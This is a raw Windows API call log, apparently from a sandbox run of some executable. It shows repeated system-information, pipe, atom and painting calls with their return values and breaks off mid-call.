lpVolumeNameBuffer=0x174fe8, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x175058, lpMaximumComponentLength=0x174f48, lpFileSystemFlags=0x174f50, lpFileSystemNameBuffer=0x174f58, nFileSystemNameSize=0x7ab | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x175058*=0x9c354b42, lpMaximumComponentLength=0x174f48*=0xff, lpFileSystemFlags=0x174f50*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.474] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.474] GetStdHandle (nStdHandle=0x7ab) returned 0xffffffff [0037.474] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.474] GetSystemMetrics (nIndex=19) returned 1 [0037.474] GetSystemMetrics (nIndex=23) returned 0 [0037.474] GetSystemInfo (in: lpSystemInfo=0x174b80 | out: lpSystemInfo=0x174b80*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.475] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.475] GetStdHandle (nStdHandle=0x1) returned 0xffffffff [0037.475] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.475] GetSystemTime (in: lpSystemTime=0x174ab0 | out: lpSystemTime=0x174ab0*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.475] OpenFile (in: lpFileName="", lpReOpenBuff=0x174ac8, uStyle=0x7aa | out: lpReOpenBuff=0x174ac8) returned 0x0 [0037.475] GetFileTime (in: hFile=0x0, lpCreationTime=0x174b54, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x174b54*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.475] FileTimeToSystemTime (in: lpFileTime=0x174b54, lpSystemTime=0x174aa0 | out: lpSystemTime=0x174aa0) returned 1 [0037.475] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x174a30, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x174a9c, lpMaximumComponentLength=0x174990, lpFileSystemFlags=0x174998, lpFileSystemNameBuffer=0x1749a0, nFileSystemNameSize=0x7ab | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x174a9c*=0x9c354b42, lpMaximumComponentLength=0x174990*=0xff, lpFileSystemFlags=0x174998*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.475] GetSystemMetrics (nIndex=19) returned 1 [0037.475] GetSystemMetrics (nIndex=23) returned 0 [0037.475] GetSystemInfo (in: lpSystemInfo=0x1745f0 | out: lpSystemInfo=0x1745f0*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.475] CreatePipe (in: hReadPipe=0x1745ec, hWritePipe=0x1745d4, lpPipeAttributes=0x1745c8, nSize=0x0 | out: hReadPipe=0x1745ec*=0x17c, hWritePipe=0x1745d4*=0x180) returned 1 [0037.475] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.475] CloseHandle (hObject=0x17c) returned 1 [0037.475] CloseHandle (hObject=0x180) returned 1 [0037.475] GetSystemTime (in: lpSystemTime=0x174090 | out: lpSystemTime=0x174090*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.475] OpenFile (in: lpFileName="", lpReOpenBuff=0x1740a8, uStyle=0x0 | out: lpReOpenBuff=0x1740a8) returned 0xffffffff [0037.475] GetFileTime (in: hFile=0x0, lpCreationTime=0x174138, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x174138*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.475] FileTimeToSystemTime (in: lpFileTime=0x174138, lpSystemTime=0x174080 | out: lpSystemTime=0x174080) returned 1 [0037.475] GetSystemTime (in: lpSystemTime=0x173c80 | out: lpSystemTime=0x173c80*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.475] OpenFile (in: lpFileName="", lpReOpenBuff=0x173c98, uStyle=0x0 | out: lpReOpenBuff=0x173c98) returned 0xffffffff [0037.475] GetFileTime (in: hFile=0x0, lpCreationTime=0x173d24, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x173d24*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.475] FileTimeToSystemTime (in: lpFileTime=0x173d24, lpSystemTime=0x173c70 | out: lpSystemTime=0x173c70) returned 1 [0037.475] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.475] GetStdHandle (nStdHandle=0x16ff) returned 0xffffffff [0037.475] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.475] GetSystemTime (in: lpSystemTime=0x173848 | out: lpSystemTime=0x173848*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.475] OpenFile (in: lpFileName="", lpReOpenBuff=0x173860, uStyle=0x0 | out: lpReOpenBuff=0x173860) returned 0xffffffff [0037.475] GetFileTime (in: hFile=0x0, lpCreationTime=0x1738f0, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x1738f0*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.475] FileTimeToSystemTime (in: lpFileTime=0x1738f0, lpSystemTime=0x173838 | out: lpSystemTime=0x173838) returned 1 [0037.475] GetSystemMetrics (nIndex=19) returned 1 [0037.475] GetSystemMetrics (nIndex=23) returned 0 [0037.476] GetSystemInfo (in: lpSystemInfo=0x1737ec | out: lpSystemInfo=0x1737ec*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.476] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x173420, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x173490, lpMaximumComponentLength=0x173380, lpFileSystemFlags=0x173388, lpFileSystemNameBuffer=0x173390, nFileSystemNameSize=0x7ab | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x173490*=0x9c354b42, lpMaximumComponentLength=0x173380*=0xff, lpFileSystemFlags=0x173388*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.476] GetSystemTime (in: lpSystemTime=0x1732d0 | out: lpSystemTime=0x1732d0*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.476] OpenFile (in: lpFileName="", lpReOpenBuff=0x1732e8, uStyle=0x0 | out: lpReOpenBuff=0x1732e8) returned 0xffffffff [0037.476] GetFileTime (in: hFile=0x0, lpCreationTime=0x173378, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x173378*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.476] FileTimeToSystemTime (in: lpFileTime=0x173378, lpSystemTime=0x1732c0 | out: lpSystemTime=0x1732c0) returned 1 [0037.476] CreatePipe (in: hReadPipe=0x1732bc, hWritePipe=0x1732a4, lpPipeAttributes=0x173298, nSize=0x0 | out: hReadPipe=0x1732bc*=0x180, hWritePipe=0x1732a4*=0x17c) returned 1 [0037.476] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.476] CloseHandle (hObject=0x180) returned 1 [0037.476] CloseHandle (hObject=0x17c) returned 1 [0037.476] GetSystemMetrics (nIndex=19) returned 1 [0037.476] GetSystemMetrics (nIndex=23) returned 0 [0037.476] GetSystemInfo (in: lpSystemInfo=0x172dc4 | out: lpSystemInfo=0x172dc4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.476] CreatePipe (in: hReadPipe=0x172a68, hWritePipe=0x172a50, lpPipeAttributes=0x172a44, nSize=0x0 | out: hReadPipe=0x172a68*=0x17c, hWritePipe=0x172a50*=0x180) returned 1 [0037.476] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.476] CloseHandle (hObject=0x17c) returned 1 [0037.476] CloseHandle (hObject=0x180) returned 1 [0037.476] GetSystemMetrics (nIndex=19) returned 1 [0037.476] GetSystemMetrics (nIndex=23) returned 0 [0037.476] GetSystemInfo (in: lpSystemInfo=0x172574 | out: lpSystemInfo=0x172574*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.476] GetSystemTime (in: lpSystemTime=0x1724c8 | out: lpSystemTime=0x1724c8*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.476] OpenFile (in: lpFileName="", lpReOpenBuff=0x1724e0, uStyle=0x0 | out: lpReOpenBuff=0x1724e0) returned 0xffffffff [0037.476] GetFileTime (in: hFile=0x0, lpCreationTime=0x17256c, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x17256c*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.477] FileTimeToSystemTime (in: lpFileTime=0x17256c, lpSystemTime=0x1724b8 | out: lpSystemTime=0x1724b8) returned 1 [0037.477] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x1720f0, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x172160, lpMaximumComponentLength=0x172050, lpFileSystemFlags=0x172058, lpFileSystemNameBuffer=0x172060, nFileSystemNameSize=0x16ff | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x172160*=0x9c354b42, lpMaximumComponentLength=0x172050*=0xff, lpFileSystemFlags=0x172058*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.477] CreatePipe (in: hReadPipe=0x17204c, hWritePipe=0x172034, lpPipeAttributes=0x172028, nSize=0x0 | out: hReadPipe=0x17204c*=0x180, hWritePipe=0x172034*=0x17c) returned 1 [0037.477] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.477] CloseHandle (hObject=0x180) returned 1 [0037.477] CloseHandle (hObject=0x17c) returned 1 [0037.477] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x1717d8, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x171848, lpMaximumComponentLength=0x171738, lpFileSystemFlags=0x171740, lpFileSystemNameBuffer=0x171748, nFileSystemNameSize=0x16ff | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x171848*=0x9c354b42, lpMaximumComponentLength=0x171738*=0xff, lpFileSystemFlags=0x171740*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.477] GetSystemTime (in: lpSystemTime=0x171688 | out: lpSystemTime=0x171688*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.477] OpenFile (in: lpFileName="", lpReOpenBuff=0x1716a0, uStyle=0x0 | out: lpReOpenBuff=0x1716a0) returned 0xffffffff [0037.477] GetFileTime (in: hFile=0x0, lpCreationTime=0x171730, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x171730*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.477] FileTimeToSystemTime (in: lpFileTime=0x171730, lpSystemTime=0x171678 | out: lpSystemTime=0x171678) returned 1 [0037.477] CreatePipe (in: hReadPipe=0x171674, hWritePipe=0x17165c, lpPipeAttributes=0x171650, nSize=0x0 | out: hReadPipe=0x171674*=0x17c, hWritePipe=0x17165c*=0x180) returned 1 [0037.477] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.477] CloseHandle (hObject=0x17c) returned 1 [0037.477] CloseHandle (hObject=0x180) returned 1 [0037.477] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.477] GetStdHandle (nStdHandle=0x1ea9) returned 0xffffffff [0037.477] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.477] GetSystemMetrics (nIndex=19) returned 1 [0037.477] GetSystemMetrics (nIndex=23) returned 0 [0037.477] GetSystemInfo (in: lpSystemInfo=0x170e00 | out: lpSystemInfo=0x170e00*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.477] CreatePipe (in: hReadPipe=0x170aa8, hWritePipe=0x170a90, lpPipeAttributes=0x170a84, nSize=0x0 | out: hReadPipe=0x170aa8*=0x180, hWritePipe=0x170a90*=0x17c) returned 1 [0037.478] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.478] CloseHandle (hObject=0x180) returned 1 [0037.478] CloseHandle (hObject=0x17c) returned 1 [0037.478] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.478] GetStdHandle (nStdHandle=0x1) returned 0xffffffff [0037.478] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.478] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x16fec0, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x16ff30, lpMaximumComponentLength=0x16fe20, lpFileSystemFlags=0x16fe28, lpFileSystemNameBuffer=0x16fe30, nFileSystemNameSize=0x1 | out: lpVolumeNameBuffer="", lpVolumeSerialNumber=0x16ff30*=0x0, lpMaximumComponentLength=0x16fe20*=0x0, lpFileSystemFlags=0x16fe28*=0x0, lpFileSystemNameBuffer="") returned 0 [0037.478] CreatePipe (in: hReadPipe=0x16fe1c, hWritePipe=0x16fe04, lpPipeAttributes=0x16fdf8, nSize=0x0 | out: hReadPipe=0x16fe1c*=0x17c, hWritePipe=0x16fe04*=0x180) returned 1 [0037.478] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.478] CloseHandle (hObject=0x17c) returned 1 [0037.478] CloseHandle (hObject=0x180) returned 1 [0037.478] GetSystemTime (in: lpSystemTime=0x16f570 | out: lpSystemTime=0x16f570*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.478] OpenFile (in: lpFileName="", lpReOpenBuff=0x16f588, uStyle=0x0 | out: lpReOpenBuff=0x16f588) returned 0xffffffff [0037.478] GetFileTime (in: hFile=0x0, lpCreationTime=0x16f614, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x16f614*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.478] FileTimeToSystemTime (in: lpFileTime=0x16f614, lpSystemTime=0x16f560 | out: lpSystemTime=0x16f560) returned 1 [0037.478] CreatePipe (in: hReadPipe=0x16f55c, hWritePipe=0x16f544, lpPipeAttributes=0x16f538, nSize=0x0 | out: hReadPipe=0x16f55c*=0x180, hWritePipe=0x16f544*=0x17c) returned 1 [0037.478] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.478] CloseHandle (hObject=0x180) returned 1 [0037.478] CloseHandle (hObject=0x17c) returned 1 [0037.478] GetSystemMetrics (nIndex=19) returned 1 [0037.478] GetSystemMetrics (nIndex=23) returned 0 [0037.478] GetSystemInfo (in: lpSystemInfo=0x16f064 | out: lpSystemInfo=0x16f064*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.478] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x16eff0, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x16f060, lpMaximumComponentLength=0x16ef50, lpFileSystemFlags=0x16ef58, lpFileSystemNameBuffer=0x16ef60, nFileSystemNameSize=0x7ab | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f060*=0x9c354b42, lpMaximumComponentLength=0x16ef50*=0xff, lpFileSystemFlags=0x16ef58*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.479] GlobalAddAtomA (lpString="Data") returned 0xc15a [0037.480] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=0, ppstm=0x18bc54 | out: ppstm=0x18bc54*=0x58f5c8) returned 0x0 [0037.480] glClearColor () returned 0x0 [0037.480] glClear () returned 0x0 [0037.480] glMatrixMode () returned 0x0 [0037.480] glLoadIdentity () returned 0x0 [0037.480] gluPerspective () returned 0x0 [0037.480] CreateStdAccessibleObject () returned 0x80004005 [0037.483] QueryPerformanceCounter (in: lpPerformanceCount=0x18a754 | out: lpPerformanceCount=0x18a754*=386214208) returned 1 [0037.483] QueryPerformanceFrequency (in: lpFrequency=0x18a490 | out: lpFrequency=0x18a490) returned 1 [0037.483] QueryPerformanceCounter (in: lpPerformanceCount=0x18a72c | out: lpPerformanceCount=0x18a72c*=386215932) returned 1 [0037.485] QueryPerformanceFrequency (in: lpFrequency=0x18a490 | out: lpFrequency=0x18a490) returned 1 [0037.485] GetTickCount () returned 0x18c37 [0037.486] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.486] TextOutW (hdc=0x0, x=1963, y=0, lpString="", c=0) returned 1 [0037.486] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.486] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.487] WTSFreeMemory (pMemory=0x0) [0037.487] GetTickCount () returned 0x18c37 [0037.488] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.488] TextOutW (hdc=0x0, x=1973, y=25, lpString="", c=0) returned 1 [0037.488] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.488] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.488] WTSFreeMemory (pMemory=0x0) [0037.488] GetTickCount () returned 0x18c37 [0037.489] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.489] TextOutW (hdc=0x0, x=1983, y=50, lpString="", c=0) returned 1 [0037.489] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.489] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.489] WTSFreeMemory (pMemory=0x0) [0037.489] GetTickCount () returned 0x18c37 [0037.489] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.489] TextOutW (hdc=0x0, x=1993, y=75, lpString="", c=0) returned 1 [0037.489] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.489] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.490] WTSFreeMemory (pMemory=0x0) [0037.490] GetTickCount () returned 0x18c37 [0037.490] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.490] TextOutW (hdc=0x0, x=2003, y=100, lpString="", c=0) returned 1 [0037.490] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.490] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.490] WTSFreeMemory (pMemory=0x0) [0037.490] GetTickCount () returned 0x18c37 [0037.491] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.491] TextOutW (hdc=0x0, x=2013, y=125, lpString="", c=0) returned 1 [0037.491] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.491] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.491] WTSFreeMemory (pMemory=0x0) [0037.491] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.491] TextOutW (hdc=0x0, x=2023, y=150, lpString="", c=0) returned 1 [0037.491] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.491] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.491] WTSFreeMemory (pMemory=0x0) [0037.492] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.492] TextOutW (hdc=0x0, x=2033, y=175, lpString="", c=0) returned 1 [0037.492] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.492] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.492] WTSFreeMemory (pMemory=0x0) [0037.492] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.492] TextOutW (hdc=0x0, x=2043, y=200, lpString="", c=0) returned 1 [0037.492] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.492] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.492] WTSFreeMemory (pMemory=0x0) [0037.493] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.493] TextOutW (hdc=0x0, x=2053, y=225, lpString="", c=0) returned 1 [0037.493] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.493] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.493] WTSFreeMemory (pMemory=0x0) [0037.493] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.493] TextOutW (hdc=0x0, x=2063, y=250, lpString="", c=0) returned 1 [0037.493] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.493] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.493] WTSFreeMemory (pMemory=0x0) [0037.493] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.493] TextOutW (hdc=0x0, x=2073, y=275, lpString="", c=0) returned 1 [0037.493] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.493] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.494] WTSFreeMemory (pMemory=0x0) [0037.494] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.494] TextOutW (hdc=0x0, x=2083, y=300, lpString="", c=0) returned 1 [0037.494] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.494] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.494] WTSFreeMemory (pMemory=0x0) [0037.494] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.494] TextOutW (hdc=0x0, x=2093, y=325, lpString="", c=0) returned 1 [0037.494] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.494] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.495] WTSFreeMemory (pMemory=0x0) [0037.495] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.495] TextOutW (hdc=0x0, x=2103, y=350, lpString="", c=0) returned 1 [0037.495] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.495] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | 